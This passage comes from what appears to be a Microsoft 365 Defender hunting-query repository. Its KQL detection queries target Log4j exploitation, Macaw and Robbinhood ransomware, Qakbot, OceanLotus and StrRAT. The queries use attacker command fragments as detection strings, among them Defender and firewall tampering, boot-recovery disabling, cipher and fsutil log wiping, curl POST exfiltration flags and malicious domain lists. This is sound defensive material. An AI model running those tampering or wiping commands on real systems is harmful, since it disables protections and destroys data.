| | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Log4J/Alerts related to Log4j vulnerability.md ================================================ # Alerts related to Log4j vulnerability Microsoft has observed attackers exploiting vulnerabilities associated with Log4J. ## Query This query looks for alerts related to the Log4J vulnerability. Devices with these alerts should be investigated for potential malicious activity. ``` AlertInfo | where Title in~('Suspicious script launched', 'Exploitation attempt against Log4j (CVE-2021-44228)', 'Suspicious process executed by a network service', 'Possible target of Log4j exploitation (CVE-2021-44228)', 'Possible target of Log4j exploitation', 'Possible Log4j exploitation', 'Network connection seen in CVE-2021-44228 exploitation', 'Log4j exploitation detected', 'Possible exploitation of CVE-2021-44228', 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning', 'Possible source of Log4j exploitation', 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt ) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Log4J/Devices with Log4j vulnerability alerts and additional other alert related context.md ================================================ # Devices with Log4j vulnerability alerts and additional other alert related context Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J. ## Query This query looks for devices that have alerts for suspected Log4J vulnerability explotation, and identifies other alerts that have been observed on the device within a given timeframe. ``` // Get any devices with Log4J related Alert Activity let DevicesLog4JAlerts = AlertInfo | where Title in~('Suspicious script launched', 'Exploitation attempt against Log4j (CVE-2021-44228)', 'Suspicious process executed by a network service', 'Possible target of Log4j exploitation (CVE-2021-44228)', 'Possible target of Log4j exploitation', 'Possible Log4j exploitation', 'Network connection seen in CVE-2021-44228 exploitation', 'Log4j exploitation detected', 'Possible exploitation of CVE-2021-44228', 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning', 'Possible source of Log4j exploitation' 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt ) // Join in evidence information | join AlertEvidence on AlertId | where DeviceId != "" | summarize by DeviceId, Title; // Get additional alert activity for each device AlertEvidence | where DeviceId in(DevicesLog4JAlerts) // Add additional info | join kind=leftouter AlertInfo on AlertId | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Log4J/Suspicious JScript staging comment.md ================================================ # Suspicious JScript staging comment Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands. ## Query This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application. ``` DeviceProcessEvents | where FileName =~ "powershell.exe" | where ProcessCommandLine has "VMBlastSG" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Log4J/Suspicious PowerShell curl flags.md ================================================ # Suspicious PowerShell curl flags Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing uncommon PowerShell flags to communicate to command-and-control infrastructure. ## Query This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the “Body” argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application. ``` DeviceProcessEvents | where FileName =~ "powershell.exe" | where ProcessCommandLine has_all("-met", "POST", "-Body") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Log4J/Suspicious process event creation from VMWare Horizon TomcatService.md ================================================ # Suspicious process event creation from VMWare Horizon TomcatService Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes. ## Query This query identifies anomalous child processes from the ws_TomcatService.exe process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application. ``` DeviceProcessEvents | where InitiatingProcessFileName has "ws_TomcatService.exe" | where FileName != "repadmin.exe" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/MacOceanLotusBackdoor.txt ================================================ // Backdoor processes associated with OceanLotus Mac Malware Backdoor // References: // https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/ // // OS platforms: Macintosh DeviceProcessEvents | where Timestamp > ago(14d) | where FileName in~ ("screenassistantd","spellagentd") | top 100 by Timestamp ================================================ FILE: Campaigns/MacOceanLotusDropper.txt ================================================ // Backdoor processes associated with OceanLotus Mac malware backdoor dropper // References: // https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/ // OS Platforms: Macintosh DeviceProcessEvents | where Timestamp > ago(14d) | where ProcessCommandLine contains "theme0" | project Timestamp, DeviceId , DeviceName, AccountName , AccountSid , InitiatingProcessCommandLine , ProcessCommandLine | top 100 by Timestamp ================================================ FILE: Campaigns/Macaw Ransomware/Disable Controlled Folders.md ================================================ # Macaw ransomware - Disable Controlled Folders Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed. ## Query This query looks for instances where the attacker has disabled the use of controlled folders. ``` DeviceProcessEvents | where InitiatingProcessFileName =~ 'cmd.exe' | where FileName =~ 'powershell.exe' and ProcessCommandLine has('powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | v | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Macaw Ransomware/Imminent Ransomware.md ================================================ # Macaw ransomware - Imminent Ransomware Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools. ## Query This query looks for instances where the attacker has run a collection of commands designed to tamper with security tools and system recovery tools. ``` DeviceProcessEvents // Pivot on specific commands | where ProcessCommandLine has_any("-ExclusionPath", "Set-MpPreference", "advfirewall", "-ExclusionExtension", "-EnableControlledFolderAccess", "windefend", "onstart", "bcdedit", "Startup") // Making list of found commands | summarize ProcessCommandLine = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 6h) // Extending columns for later aggregration, based on TTP | extend StartUpExclusionPath = iff(ProcessCommandLine has_all("-ExclusionPath", "Startup"), 1, 0) | extend DefenderTamp = iff(ProcessCommandLine has "Set-MpPreference" and ProcessCommandLine has_any( "-SevereThreatDefaultAction 6" "-HighThreatDefaultAction 6", "-ModerateThreatDefaultAction 6", "-LowThreatDefaultAction 6" "-ScanScheduleDay 8"), 1, 0) | extend NetshFirewallTampering = iff(ProcessCommandLine has_all( "netsh", "advfirewall", "allprofiles state off"), 1, 0) | extend BatExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".bat"), 1, 0) | extend ExeExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".exe"), 1, 0) | extend DisableControlledFolderAccess = iff(ProcessCommandLine has_all("-EnableControlledFolderAccess", "Disabled"), 1, 0) | extend ScDeleteDefend = iff(ProcessCommandLine has_all("sc", "delete", "windefend"), 1, 0) | extend BootTampering = iff(ProcessCommandLine has_all("bcdedit", "default") and ProcessCommandLine has_any ("recoveryenabled No", "bootstatuspolicy ignoreallfailures"), 1, 0) | extend SchTasks = iff(ProcessCommandLine has_all("/sc", "onstart", "system", "/create", "/delay"), 1, 0) // Summarizing found commands | summarize by NetshFirewallTampering ,BatExclusion, ExeExclusion, DisableControlledFolderAccess, ScDeleteDefend, SchTasks, BootTampering, DefenderTamp, StartUpExclusionPath, DeviceId, Timestamp // Adding up each piece of evidence | extend EvidenceCount = NetshFirewallTampering + BatExclusion + ExeExclusion + DisableControlledFolderAccess + ScDeleteDefend + SchTasks + BootTampering + DefenderTamp + StartUpExclusionPath | where EvidenceCount > 4 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | v | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Macaw Ransomware/Inhibit recovery by disabling tools and functionality.md ================================================ # Macaw ransomware - Inhibit recovery by disabling tools and functionality Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts. ## Query This query looks for instances where the attacker has disabled various tools including Task Manager, CMD, and Registry Tools. ``` DeviceProcessEvents | where ProcessCommandLine has_all ("reg", "add") | where ProcessCommandLine has_any("DisableTaskMgr", "DisableCMD", "DisableRegistryTools", "NoRun") and ProcessCommandLine has "REG_DWORD /d \"1\"" | summarize ProcessCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by InitiatingProcessCommandLine, DeviceId, bin(Timestamp, 3m) | where ProcessCount > 2 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | v | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Macaw Ransomware/Mass account password change.md ================================================ # Macaw ransomware - Mass account password change Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impeded recovery efforts. ## Query This query looks for instances of attackers changes hundreds of account passwords within short succession. ``` DeviceProcessEvents | where ProcessCommandLine has_all('user', '/Domain', '/Active:Yes', '/PasswordChg:No') | summarize commands=count() by DeviceId, bin(Timestamp, 1d) | where commands > 200 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | v | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Macaw Ransomware/PSExec Attrib commands.md ================================================ # Macaw ransomware - PSExec Attrib commands Prior to deploying Macaw ransomware in an organization, adversaries wil use Attrib to display file attribute information on multiple drives and all subfolders. ## Query This query looks for PSExec utilizing a .bat file to run the attrib command with parameters observed in Macaw incidents. ``` DeviceProcessEvents | where InitiatingProcessParentFileName endswith "PSEXESVC.exe" | where InitiatingProcessCommandLine has ".bat" | where FileName =~ "cmd.exe" and ProcessCommandLine has_all("-s", "-h", "-r", "-a", "*.*") | take 100 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | v | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Macaw Ransomware/Use of MSBuild as LOLBin.md ================================================ # Macaw Ransomware - Use of MSBuild.exe as a LOLBin Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2. ## Query This query looks for instances of MSBuild.exe being used as a LOLBin. ``` DeviceProcessEvents | where InitiatingProcessFileName =~ "wmiprvse.exe" | where FileName =~ "msbuild.exe" and ProcessCommandLine has "programdata" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/OceanLotus registry activity.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml // Questions via Twitter: @janvonkirchheim DeviceRegistryEvents | where Timestamp > ago(7d) | where ActionType == "RegistryValueSet" | where RegistryKey endswith @"\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model" or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application" or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\DefaultIcon" or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\Application" or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\DefaultIcon" or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\Application" or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon" ================================================ FILE: Campaigns/Qakbot/Excel launching anomalous processes.md ================================================ # Excel launching anomalous processes ## Query Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indicate that the payload was delivered and executed, though reconnaissance and successful implantation hasn’t been completed yet. ``` DeviceProcessEvents | where InitiatingProcessParentFileName has "excel.exe" or InitiatingProcessFileName =~ "excel.exe" | where InitiatingProcessFileName in~ ("excel.exe","regsvr32.exe") | where FileName in~ ("regsvr32.exe", "rundll32.exe")| where ProcessCommandLine has @"..\" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Qakbot/General attempts to access local email store.md ================================================ # General attempts to access local email store ## Query Use this query to find attempts to access files in the local path containing Outlook emails. ``` DeviceFileEvents | where FolderPath hasprefix "EmailStorage" | where FolderPath has "Outlook" | project FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, DeviceId, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | v | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Qakbot/Qakbot Craigslist Domains.md ================================================ # Qakbot Craigslist Domains Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is instructed to manually type into the address bar to access. ## Query This query looks for network connections to domains impersonating Craigslist which are associated with the delivery of Qakbot. ``` DeviceNetworkEvents | where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Qakbot/Qakbot email theft.md ================================================ # Qakbot email theft ## Query Use this query to find email stealing activities ran by Qakbot that will use “ping.exe -t 127.0.0.1” to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indicates that the malware completed a large portion of its automated activity without interruption. Generic: ``` DeviceFileEvents | where InitiatingProcessFileName =~ 'ping.exe' | where FileName endswith '.eml' ``` Specific: ``` DeviceFileEvents | where InitiatingProcessFileName =~ 'ping.exe' and InitiatingProcessCommandLine == 'ping.exe -t 127.0.0.1' and InitiatingProcessParentFileName in~('msra.exe', 'mobsync.exe') and FolderPath endswith ".eml" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | v | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Qakbot/Qakbot reconnaissance activities.md ================================================ # Qakbot reconnaissance activities ## Query Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltrate system information. This data, once exfiltrated, will be used to prioritize human operated actions. ``` DeviceProcessEvents | where InitiatingProcessFileName == InitiatingProcessCommandLine | where ProcessCommandLine has_any ( "whoami /all","cmd /c set","arp -a","ipconfig /all","net view /all","nslookup -querytype=ALL -timeout=10", "net share","route print","netstat -nao","net localgroup") | summarize dcount(FileName), make_set(ProcessCommandLine) by DeviceId,bin(Timestamp, 1d), InitiatingProcessFileName, InitiatingProcessCommandLine | where dcount_FileName >= 8 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Ransomware hits healthcare - Alternate Data Streams use.txt ================================================ // Find use of Alternate Data Streams (ADS) for anti-forensic purposes. // Alternate Data Streams execution DeviceProcessEvents | where Timestamp > ago(7d) // Command lines used | where ProcessCommandLine startswith "-q -s" and ProcessCommandLine has "-p" // Removing IDE processes and not(FolderPath has_any("visual studio", "ide")) | summarize make_set(ProcessCommandLine), make_set(FolderPath), make_set(InitiatingProcessCommandLine) by DeviceId, bin(Timestamp, 1h) ================================================ FILE: Campaigns/Ransomware hits healthcare - Backup deletion.txt ================================================ // List alerts flagging attempts to delete backup files ​ AlertInfo | where Timestamp > ago(7d) | where Title == "File backups were deleted" | join AlertEvidence on AlertId ================================================ FILE: Campaigns/Ransomware hits healthcare - Cipher.exe tool deleting data.txt ================================================ ​// Look for cipher.exe deleting data from multiple drives. // This is often performed as an anti-forensic measure prior to encryption. DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ "cipher.exe" // Looking for /w flag for deleting | where ProcessCommandLine has "/w" | summarize CommandCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m) // Looking for multiple drives in a short timeframe | where CommandCount > 1 ================================================ FILE: Campaigns/Ransomware hits healthcare - Clearing of system logs.txt ================================================ ​// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts. DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ "fsutil.exe" and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal" ================================================ FILE: Campaigns/Ransomware hits healthcare - Possible compromised accounts.txt ================================================ // Identify accounts that have logged on to affected endpoints // Check for specific alerts AlertInfo | where Timestamp > ago(7d) // Attempts to clear security event logs. | where Title in("Event log was cleared", // List alerts flagging attempts to delete backup files. "File backups were deleted", // Potential Cobalt Strike activity - Note that other threat activity can also // trigger alerts for suspicious decoded content "Suspicious decoded content", // Cobalt Strike activity "'Atosev' malware was detected", "'Ploty' malware was detected", "'Bynoco' malware was detected") | extend AlertTime = Timestamp | join AlertEvidence on AlertId | distinct DeviceName, AlertTime, AlertId, Title | join DeviceLogonEvents on DeviceName // Creating 10 day Window surrounding alert activity | where Timestamp < AlertTime +5d and Timestamp > AlertTime - 5d // Projecting specific columns | project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain, AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName ================================================ FILE: Campaigns/Ransomware hits healthcare - Robbinhood activity.txt ================================================ // Find distinct evasion and execution activities // associated with the Robbinhood ransomware campaign. DeviceProcessEvents | where Timestamp > ago(7d) | where InitiatingProcessFileName =~ "winlogon.exe" | where FileName == "cmd.exe" and ProcessCommandLine has_any("taskkill", "net", "robbin", "vssadmin", "bcdedit", "wevtutil") ================================================ FILE: Campaigns/Ransomware hits healthcare - Turning off System Restore.txt ================================================ // Find attempts to stop System Restore and // prevent the system from creating restore points DeviceProcessEvents | where Timestamp > ago(7d) // Pivoting for rundll32 and InitiatingProcessFileName =~ 'rundll32.exe' // Looking for empty command line and isnotempty(InitiatingProcessCommandLine) // Looking for schtasks.exe as the created process and FileName in~ ('schtasks.exe') // Disabling system restore and ProcessCommandLine has 'Change' and ProcessCommandLine has 'SystemRestore' and ProcessCommandLine has 'disable' ================================================ FILE: Campaigns/Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt ================================================ // Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools ​DeviceFileEvents | where Timestamp > ago(7d) | where SHA1 in('0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427') ================================================ FILE: Campaigns/StrRAT malware/StrRAT-AV-Discovery.md ================================================ # StrRAT Malware AV Discovery StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the infected machine based on C2 server command. Additionally, this threat also has a ransomware encryption/decryption module which appends .crimson extension. ## Query The following query looks for instances of defense evasion behavior, whereby the malware attempts to discover the Antivirus production solutions in place on the compromised device. ``` DeviceProcessEvents | where InitiatingProcessFileName in~("java.exe", "javaw.exe") and InitiatingProcessCommandLine has "roaming" | where FileName == 'cmd.exe' and ProcessCommandLine has 'path antivirusproduct get displayname' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/StrRAT malware/StrRAT-Email-Delivery.md ================================================ # StrRAT Malware Email Delivery StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the infected machine based on C2 server command. Additionally, this threat also has a ransomware encryption/decryption module which appends .crimson extension. ## Query The following query looks for emails containing domains known to be associated with delivering StrRAT malware. ``` EmailUrlInfo | where UrlDomain has_any ('metroscaffingltg.co.uk', 'pg-finacesolutions.co.uk', 'jpfletcherconsultancy.co.uk', 'buildersworlinc.co.uk', 'bentlyconstbuild.co.uk', 'alfredoscafeltd.co.uk', 'zincocorporation.co.uk', 'playerscircleinc.co.uk', 'tg-cranedinc.co.uk', 'adamridley.co.uk', 'westcoasttrustedtaxis.co.uk', 'sivospremiumclub.co.uk', 'gossyexperience.co.uk', 'jeffersonsandc.co.uk', 'fillinaresortsltd.co.uk', 'tk-consultancyltd.co.uk') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/StrRAT malware/StrRAT-Malware-Persistence.md ================================================ # StrRAT Malware Persistence StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the infected machine based on C2 server command. Additionally, this threat also has a ransomware encryption/decryption module which appends .crimson extension. ## Query The following query looks for the scheduled task named "Skype," which is created by the StrRAT JAR file. This creates persistence on the impacted machine. ``` DeviceProcessEvents | where InitiatingProcessFileName in~("java.exe","javaw.exe") | where FileName == 'cmd.exe' and ProcessCommandLine has_all("schtasks /create", "tn Skype") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential 